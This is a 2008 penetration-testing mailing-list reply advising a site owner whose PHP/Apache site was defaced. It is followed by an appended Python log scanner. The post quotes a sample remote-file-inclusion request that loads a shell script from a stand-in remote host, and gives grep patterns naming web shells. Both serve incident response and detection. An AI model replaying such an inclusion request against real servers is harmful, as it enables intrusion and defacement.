Penetration Testing mailing list archives
Re: Hacked by aLpTurkTegin, help patching this hole
From: yummy <animalstastegood () gmail com>
Date: Sun, 25 May 2008 20:03:49 -0400
What user owned the hacked files, the user account or the webserver? In my experience, if it was the user account, then there was a weak password and it was bruteforced. Check the ftp logs for file uploads for that user account. If it was owned by the webserver, then there is probably exploitable php code on the site and usually it is due to a remote file inclusion. Check the apache domlogs, you might get lucky and find something. RFI entries often look something like:

    69.89.25.169 - - [25/Jan/2008:10:23:23 -0500] "GET //includes/img/settings.inc.php?include_path=http://example.remoteserver.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 200 - "-"

In the above example, the php file "settings.inc.php" is vulnerable and allows the code in a php file on a remote server (example.remoteserver.com) to be included (cmd.txt). Many times the remote file will be a phpshell. Of course this is just an example, you'd have to find what is being exploited by what the others have suggested...

Sorry, this is kinda long winded and pretty much what everyone else said, but I have to deal with annoying defacement of sites every day. People that do that really bug me, plus I'm bored right now. :)

One HUGE help would be to make sure you have mod_security installed and a decent modsec ruleset. That will prevent a lot of naughtiness from happening.

I like to also check for perl procs running as the webserver id, world-writable directories, and phpshells located in user accounts.

    find /home/useraccountname/public_html/ -type d -perm 777

will locate insecure directories. The following one-liner will find many common phpshells:

    find /home/*/public_html -type f -print0 | xargs -0 egrep '(\/tmp\/cmdtemp|SnIpEr_SA|c99shell|r57shell|milw0rm)'

It may take quite a while to complete depending on how many files there are on the server.

My money is on an outdated php CMS/forum like phpbb, etc., like everyone else mentioned...
On Tue, May 20, 2008 at 8:46 AM, Mifa <mifa () stangercorp com> wrote:
> Our website was defaced by aLpTurkTegin. We are running apache, php etc. Does anyone know how this hacker is getting in and what I can do to prevent this? Our main web directory had all but one file deleted and hackedIndex.php, a.asp (a 0 byte file) and trustscn_put_test2 were placed into the main directory. The fact that the webserver served hackedindex.php makes me think it's an apache web server flaw. Any comments, suggestions?
>
> Thanks,
> -D

------------------------------------------------------------------------
This list is sponsored by: Cenzic
Top 5 Common Mistakes in Securing Web Applications
Find out now! Get Webinar Recording and PPT Slides
www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------
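The domlog review yummy describes above, as an added example that is not part of the original thread: a small Python scanner that flags access-log requests where a query parameter value is itself a URL, which is the trace a remote file inclusion attempt leaves behind. The log lines below are constructed for the example; the first copies the RFI pattern quoted in the post, and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Apache common/combined log line: client ip, identd, user, [timestamp],
# "METHOD target PROTOCOL", status.  Only the fields we use are captured.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log (not from a real server).  Line 1 mirrors the RFI
# entry shown in the post, line 2 is benign, line 3 hides the URL behind
# percent-encoding, which a naive grep for "=http://" would miss.
SAMPLE_LOG = """\
69.89.25.169 - - [25/Jan/2008:10:23:23 -0500] "GET //includes/img/settings.inc.php?include_path=http://example.remoteserver.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 200 - "-"
10.0.0.5 - - [25/Jan/2008:10:24:01 -0500] "GET /index.php?page=about HTTP/1.1" 200 512 "-"
10.0.0.6 - - [25/Jan/2008:10:24:09 -0500] "GET /index.php?page=http%3A%2F%2Fexample.net%2Fx.txt HTTP/1.1" 200 88 "-"
"""

REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def rfi_candidates(log_text):
    """Return (client_ip, path, param, remote_url) for every request whose
    query string carries a parameter whose value is a remote URL.  The HTTP
    status is deliberately ignored: the remote fetch can fail and still show
    which script and parameter an attacker is probing."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line
        client, _ts, _method, target, _status = m.groups()
        # Split on the first '?' by hand: urlsplit would treat a leading
        # "//" (as in the post's example) as a hostname, not a path.
        path, _, query = target.partition('?')
        # parse_qsl percent-decodes values, so encoded URLs are caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_SCHEME.match(value):
                hits.append((client, path, name, value))
    return hits


if __name__ == '__main__':
    for client, path, name, url in rfi_candidates(SAMPLE_LOG):
        print(f'{client} {path} {name}={url}')
```

Run it against a real domlog with `rfi_candidates(open(path).read())`; each hit names the local script and parameter worth inspecting for an unchecked include.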